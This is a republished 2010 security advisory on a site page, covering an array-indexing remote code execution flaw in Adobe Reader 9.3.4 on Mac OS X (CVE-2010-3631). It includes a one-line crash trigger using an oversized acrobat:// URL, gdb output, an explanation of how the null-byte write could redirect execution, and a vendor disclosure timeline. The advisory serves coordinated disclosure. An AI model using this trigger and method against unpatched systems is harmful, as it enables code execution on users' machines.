首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Acrobat and Reader Array Indexing Remote Code Execution Vulnerability
来源:http://www.nsense.dk 作者:Knud 发布时间:2010-10-07  

nSense Vulnerability Research Security Advisory NSENSE-2010-001
---------------------------------------------------------------

Affected Vendor:    Adobe
Affected Product:   Adobe Reader 9.3.4 for Macintosh
Platform:           OS X
Impact:             User assisted code execution
Vendor response:    Patch
Credit:             Knud / nSense

Description: Adobe Acrobat and Reader are prone to a remote code-execution vulnerability.  Attackers   can exploit this issue to execute arbitrary code in the context of the user running the affected application.  Adobe Reader and Acrobat versions prior to and including 9.3.4 and 8.2.4 are affected.

NOTE: This issue only affects Adobe Reader and Acrobat running on Apple Mac OS X      

Technical details
---------------------------------------------------------------

terminal 1:
$ gdb --waitfor=AdobeReader

terminal 2:
$ open acrobat://`perl -e 'print "A" x 12000'`

terminal 1:
(gdb) cont
[snip]
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0xc00013d2
0x7ffa0d6a in AcroBundleThreadQuitProc ()
(gdb) set disassembly-flavor intel
(gdb) x/i $pc
0x7ffa0d6a <AcroBundleThreadQuitProc+2608>:     mov    BYTE PTR
[ebp+eax-0x420],0x0
(gdb) i r ebp eax
ebp            0xbfffe908       0xbfffe908
eax            0x2eea   12010
(gdb)

As can be seen from the above, we control the value in eax (in
this case 12010, the length of the acrobat:// + the 12000 A's).

This allows us to write the null byte anywhere in memory between
ebp-0x420 (0xBFFFE4E8) and the end of the stack.

The behaviour may be leveraged to modify the frame pointer,
changing the execution flow and thus permitting arbitrary code
execution in the context of the user running the program.

Timeline:
Aug 10th         Contacted vendor PSIRT
Aug 10th         Vendor response. Vulnerability reproduced.
Aug 16th         Status update request sent to vendor
Aug 17th         Vendor response, still investigating
Sep 2nd          Status update request sent to vendor
Sep 3rd          Vendor response. Working on fix
Sep 22nd         Contacted vendor regarding patch date
Sep 22nd         Vendor response. Confirmed patch date.
Sep 23rd         Corrected researcher name
Oct 1st          Vendor sent CVE identifier CVE-2010-3631
Oct 5th          Vendor releases the patch
Oct 6th          Advisory published

http://www.nsense.fi                       http://www.nsense.dk

 

$$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
$$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
$$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
$$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
$$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

               D r i v e n   b y   t h e   c h a l l e n g e _


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ASP.NET Padding Oracle Vulnera
·Abhimanyu Infotech (show_news.
·HP Data Protector Media Operat
·SnackAmp 3.1.3B Malicious SMP
·FreeBSD 'pseudofs' NULL Pointe
·Microsoft IIS FTP Server NLST
·win32/xp pro sp3 (EN) 32-bit -
·generic win32 - add new local
·FreeBSD 2010 8.*, 7.* Local Ro
·Cilem Haber v1.4.4 (Tr) Databa
·HP Data Protector Manager v6.1
·kernel-2.6.18-164 2010 Local R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved